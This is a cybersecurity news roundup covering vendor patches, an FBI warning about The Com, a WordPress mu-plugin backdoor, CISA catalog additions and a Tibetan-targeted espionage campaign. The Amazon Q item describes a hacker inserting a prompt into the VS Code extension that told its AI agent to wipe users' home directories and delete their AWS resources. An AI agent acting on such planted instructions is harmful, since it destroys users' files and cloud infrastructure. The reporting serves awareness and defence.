In today’s cybersecurity news…
SonicWall announces SMA 100 patches
Following up on a story we covered last week, network security company SonicWall announced on Wednesday the release of patches for a critical vulnerability in Secure Mobile Access (SMA) 100 series secure access gateways. It recommends that customers take immediate action, following the recent Overstep malware attacks. This new flaw has a CVE number (CVE-2025-40599) and a CVSS score of 9.1. It is described as “an arbitrary file upload issue in the SMA 100’s web management interface,” which could allow for remote code execution (RCE) by attackers who already have access to administrative privileges.
FBI warns about The Com – a mass-criminal organization
The Com is a “loosely organized cybercriminal organization” that launches cyberattacks to steal money and gain access to sensitive information. The Bureau says The Com is “composed primarily of English-speaking minors but has expanded to include thousands of people who engage in a variety of cybercriminal activities”. They add that the group’s sophistication “has grown over the last four years, with subjects employing increasingly complex methods to mask their identities, hide financial transactions, and launder money.” Minors are recruited since being underage promises less harsh penalties if caught. Scattered Spider, known for a number of high profile attacks this year, is an affiliate of the group.
Compromised Amazon Q extension told AI to delete everything
A hacker, whose apparent intent was to expose bad security practices, succeeded somewhat by compromising the official Amazon Q extension for Visual Studio Code to add a prompt to use and AI agent to wipe a user’s home directory and delete all their AWS resources. According to a report from 404 Media, the hacker “submitted a pull request to the AWS repository from “a random account with no existing access” and were given admin credentials. They said that AWS then released the compromised package “completely oblivious.” Amazon quickly removed the unapproved code, and the hacker’s credentials, but no explanation of how this happened has been released.
(The Register and 404 Media)
WordPress backdoor hides inside Mu-plugin
A new backdoor has been discovered in WordPress “Must-use” plugins (aka mu-plugins) – one that will give threat actors “persistent access and allow them to perform arbitrary actions.” These plugins are automatically activated on all WordPress sites in the installation and are stored in the “wp-content/mu-plugins” directory. They “do not show up in the default list of plugins on the Plugins page of wp-admin and cannot be disabled except by removing the plugin file from the must-use directory.” The backdoor, a PHP script, was discovered by web security company Sucuri.
Huge thanks to our sponsor, Nudge Security
Brave blocks Windows Recall from screenshotting browsing activity
The makers of Brave Software say its browser, already well known for privacy features, will block Microsoft’s Windows new Recall product from capturing screenshots of Brave windows. The feature will be active by default. Facing up to widespread criticism, Microsoft has added an opt-out feature to some Windows packages, but this marks a first step in blocking the feature out of the gate, by setting the SetInputScope API to IS_PRIVATE for all browser windows.
CISA adds CrushFTP, Google Chromium, and SysAid flaws to its Known Exploited Vulnerabilities catalog
CISA has added CrushFTP, Google Chromium, and SysAid flaws to its Known Exploited Vulnerabilities (KEV) catalog. This follows a CrushFTP warning of a zero-day with a CVSS score of 9.0) that has been exploited since July 18, six Google Chrome flaws, including one actively exploited in the wild tracked, and three flaws from SysAid. CISA orders federal agencies to fix the vulnerabilities by August 12, 2025.
Mitel warns of critical MiVoice MX-ONE authentication bypass flaw
Mitel Networks has “released security updates to patch a critical-severity authentication bypass vulnerability impacting its MiVoice MX-ONE enterprise communications platform.” This is an SIP-based communications system, (Session Initiation Protocol) which can scale to support hundreds of thousands of users. According to BleepingComputer, “the critical security flaw is due to an improper access control weakness discovered in the MiVoice MX-ONE Provisioning Manager component and has yet to be assigned a CVE ID.” Unauthenticated attackers can exploit it in low-complexity attacks that don’t require user interaction to gain unauthorized access to administrator accounts on unpatched systems.
Fake Dalai Lama apps spy on Tibetan community
Devotees who wanted to send a note of good wishes to the spiritual leader as his 90th birthday approached on July 6, were unwittingly targeted by a China-affiliated cyber espionage group using two campaigns named by Zscaler ThreatLabz as Operation GhostChat and Operation PhantomPrayers. These were standard watering hole operations, redirecting users from a legitimate but compromised website to a fraudulent one. This replica page offered the option for well-wishers to send an encrypted greeting by downloading a secure chat application, which ultimately was the launch vector for a remote access trojan.
